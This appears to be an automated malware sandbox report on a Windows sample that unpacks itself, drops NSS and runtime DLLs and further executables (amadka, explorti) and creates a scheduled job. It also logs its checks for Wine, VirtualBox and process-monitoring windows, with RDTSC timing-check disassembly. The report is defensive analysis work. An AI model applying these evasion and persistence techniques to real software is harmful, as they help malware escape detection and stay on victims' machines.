Source: Binary string: mozglue.pdb source: file.exe, 00000000.00000002.1472235456.000000006CE1D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.920000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;.data:EW; vs Unknown_Section0:EW;Unknown_Section1:R;Unknown_Section2:W;Unknown_Section3:R;Unknown_Section4:EW;.data:EW;
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe Unpacked PE file: 17.2.JDGCFBAFBF.exe.e10000.0.unpack :EW;.rsrc:W;.idata :W; :EW;rxceoony:EW;zwqjotmk:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;rxceoony:EW;zwqjotmk:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Unpacked PE file: 19.2.explorti.exe.9e0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;rxceoony:EW;zwqjotmk:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;rxceoony:EW;zwqjotmk:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Unpacked PE file: 23.2.explorti.exe.9e0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;rxceoony:EW;zwqjotmk:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;rxceoony:EW;zwqjotmk:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Unpacked PE file: 25.2.explorti.exe.9e0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;rxceoony:EW;zwqjotmk:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;rxceoony:EW;zwqjotmk:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Unpacked PE file: 27.2.explorti.exe.9e0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;rxceoony:EW;zwqjotmk:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;rxceoony:EW;zwqjotmk:EW;.taggant:EW;
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CDA3480 ?ComputeProcessUptime@TimeStamp@mozilla@@CA_KXZ,GetCurrentProcess,GetProcessTimes,LoadLibraryW,GetProcAddress,__Init_thread_footer,__aulldiv,FreeLibrary,GetSystemTimeAsFileTime, 0_2_6CDA3480
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .data
PE file contains an invalid checksum
Source: explorti.exe.17.dr Static PE information: real checksum: 0x1d3d90 should be: 0x1dd24a
Source: file.exe Static PE information: real checksum: 0x0 should be: 0x25a165
Source: amadka[1].exe.0.dr Static PE information: real checksum: 0x1d3d90 should be: 0x1dd24a
Source: JDGCFBAFBF.exe.0.dr Static PE information: real checksum: 0x1d3d90 should be: 0x1dd24a
PE file contains sections with non-standard names
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name:
Source: freebl3[1].dll.0.dr Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr Static PE information: section name: .00cfg
Source: mozglue[1].dll.0.dr Static PE information: section name: .00cfg
Source: msvcp140.dll.0.dr Static PE information: section name: .didat
Source: msvcp140[1].dll.0.dr Static PE information: section name: .didat
Source: nss3.dll.0.dr Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr Static PE information: section name: .00cfg
Source: freebl3.dll.0.dr Static PE information: section name: .00cfg
Source: JDGCFBAFBF.exe.0.dr Static PE information: section name:
Source: JDGCFBAFBF.exe.0.dr Static PE information: section name: .idata
Source: JDGCFBAFBF.exe.0.dr Static PE information: section name:
Source: JDGCFBAFBF.exe.0.dr Static PE information: section name: rxceoony
Source: JDGCFBAFBF.exe.0.dr Static PE information: section name: zwqjotmk
Source: JDGCFBAFBF.exe.0.dr Static PE information: section name: .taggant
Source: amadka[1].exe.0.dr Static PE information: section name:
Source: amadka[1].exe.0.dr Static PE information: section name: .idata
Source: amadka[1].exe.0.dr Static PE information: section name:
Source: amadka[1].exe.0.dr Static PE information: section name: rxceoony
Source: amadka[1].exe.0.dr Static PE information: section name: zwqjotmk
Source: amadka[1].exe.0.dr Static PE information: section name: .taggant
Source: explorti.exe.17.dr Static PE information: section name:
Source: explorti.exe.17.dr Static PE information: section name: .idata
Source: explorti.exe.17.dr Static PE information: section name:
Source: explorti.exe.17.dr Static PE information: section name: rxceoony
Source: explorti.exe.17.dr Static PE information: section name: zwqjotmk
Source: explorti.exe.17.dr Static PE information: section name: .taggant
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CDDB536 push ecx; ret 0_2_6CDDB549
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 19_2_009FD82C push ecx; ret 19_2_009FD83F
Source: file.exe Static PE information: section name: entropy: 7.9941784269067595
Source: file.exe Static PE information: section name: entropy: 7.973056301433428
Source: file.exe Static PE information: section name: entropy: 7.946374251055881
Source: JDGCFBAFBF.exe.0.dr Static PE information: section name: entropy: 7.983257616739134
Source: JDGCFBAFBF.exe.0.dr Static PE information: section name: rxceoony entropy: 7.952543249693762
Source: amadka[1].exe.0.dr Static PE information: section name: entropy: 7.983257616739134
Source: amadka[1].exe.0.dr Static PE information: section name: rxceoony entropy: 7.952543249693762
Source: explorti.exe.17.dr Static PE information: section name: entropy: 7.983257616739134
Source: explorti.exe.17.dr Static PE information: section name: rxceoony entropy: 7.952543249693762
Drops PE files
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\vcruntime140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\amadka[1].exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe File created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\nss3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file
Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file

Boot Survival
barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Creates job files (autostart)
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe File created: C:\Windows\Tasks\explorti.job Jump to behavior
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CE055F0 LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_6CE055F0
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: FF60D3 second address: FF60E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3460CF07FBh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: FF60E3 second address: FF60ED instructions: 0x00000000 rdtsc 0x00000002 jo 00007F3460BFB96Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: FF6378 second address: FF6391 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 pop esi 0x00000008 jnl 00007F3460CF07F8h 0x0000000e push eax 0x0000000f pop eax 0x00000010 pushad 0x00000011 jnp 00007F3460CF07F6h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: FF6651 second address: FF665A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: FF665A second address: FF6660 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: FF6660 second address: FF6667 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: FF6667 second address: FF666D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: FF67FB second address: FF6825 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007F3460BFB978h 0x0000000b push eax 0x0000000c pop eax 0x0000000d popad 0x0000000e jne 00007F3460BFB980h 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: FF6825 second address: FF682B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: FF917C second address: FF91AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 mov eax, dword ptr [eax] 0x00000008 jbe 00007F3460BFB97Eh 0x0000000e jmp 00007F3460BFB978h 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 pushad 0x00000018 push edi 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: FF91AA second address: FF91B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: FF91B4 second address: FF921C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pop eax 0x00000007 or dword ptr [ebp+122D2AB4h], ecx 0x0000000d push 00000003h 0x0000000f sub dword ptr [ebp+122D2DFAh], esi 0x00000015 push 00000000h 0x00000017 jns 00007F3460BFB966h 0x0000001d push 00000003h 0x0000001f mov dword ptr [ebp+122D1995h], ecx 0x00000025 call 00007F3460BFB969h 0x0000002a jmp 00007F3460BFB979h 0x0000002f push eax 0x00000030 jg 00007F3460BFB96Ah 0x00000036 mov eax, dword ptr [esp+04h] 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007F3460BFB970h 0x00000041 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: FF921C second address: FF9222 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: FF9222 second address: FF9226 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: FF9226 second address: FF926B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push eax 0x0000000b push ecx 0x0000000c jmp 00007F3460CF0800h 0x00000011 pop ecx 0x00000012 pop eax 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a jmp 00007F3460CF0809h 0x0000001f jo 00007F3460CF07F6h 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: FF9358 second address: FF93BD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3460BFB976h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F3460BFB971h 0x0000000e popad 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 push ebx 0x00000014 jmp 00007F3460BFB973h 0x00000019 pop ebx 0x0000001a mov eax, dword ptr [eax] 0x0000001c jg 00007F3460BFB975h 0x00000022 mov dword ptr [esp+04h], eax 0x00000026 pushad 0x00000027 push eax 0x00000028 push edx 0x00000029 push ebx 0x0000002a pop ebx 0x0000002b rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: FF93BD second address: FF93CF instructions: 0x00000000 rdtsc 0x00000002 je 00007F3460CF07F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jp 00007F3460CF07F6h 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: FF93CF second address: FF943D instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F3460BFB966h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pop eax 0x0000000c push 00000000h 0x0000000e push ebx 0x0000000f call 00007F3460BFB968h 0x00000014 pop ebx 0x00000015 mov dword ptr [esp+04h], ebx 0x00000019 add dword ptr [esp+04h], 0000001Ah 0x00000021 inc ebx 0x00000022 push ebx 0x00000023 ret 0x00000024 pop ebx 0x00000025 ret 0x00000026 jmp 00007F3460BFB978h 0x0000002b mov esi, edi 0x0000002d lea ebx, dword ptr [ebp+1244DF40h] 0x00000033 sub ecx, dword ptr [ebp+122D263Bh] 0x00000039 or esi, 68B06C6Fh 0x0000003f push eax 0x00000040 push eax 0x00000041 push edx 0x00000042 push eax 0x00000043 push edx 0x00000044 jmp 00007F3460BFB96Fh 0x00000049 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: FF943D second address: FF9443 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: FF9443 second address: FF944D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F3460BFB966h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: FF953D second address: FF9541 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1019A88 second address: 1019AB7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3460BFB96Bh 0x00000007 pushad 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a jmp 00007F3460BFB96Fh 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 je 00007F3460BFB970h 0x0000001a pushad 0x0000001b push edx 0x0000001c pop edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: FE55A1 second address: FE55A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: FE55A5 second address: FE55A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: FE55A9 second address: FE55B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: FE55B5 second address: FE55BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: FE55BB second address: FE55BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1017D76 second address: 1017D7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1017D7C second address: 1017D9D instructions: 0x00000000 rdtsc 0x00000002 jns 00007F3460CF07F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b jno 00007F3460CF07F6h 0x00000011 pop edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 jmp 00007F3460CF07FBh 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1017F3F second address: 1017F43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 10182AC second address: 10182C7 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F3460CF07F6h 0x00000008 jc 00007F3460CF07F6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 jne 00007F3460CF07F6h 0x00000017 push edx 0x00000018 pop edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1018425 second address: 101844C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F3460BFB975h 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jbe 00007F3460BFB96Ah 0x00000013 push eax 0x00000014 pop eax 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 10185CB second address: 10185EC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F3460CF0809h 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1018736 second address: 101873E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 101873E second address: 1018744 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1018744 second address: 1018763 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3460BFB978h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c rdtsc
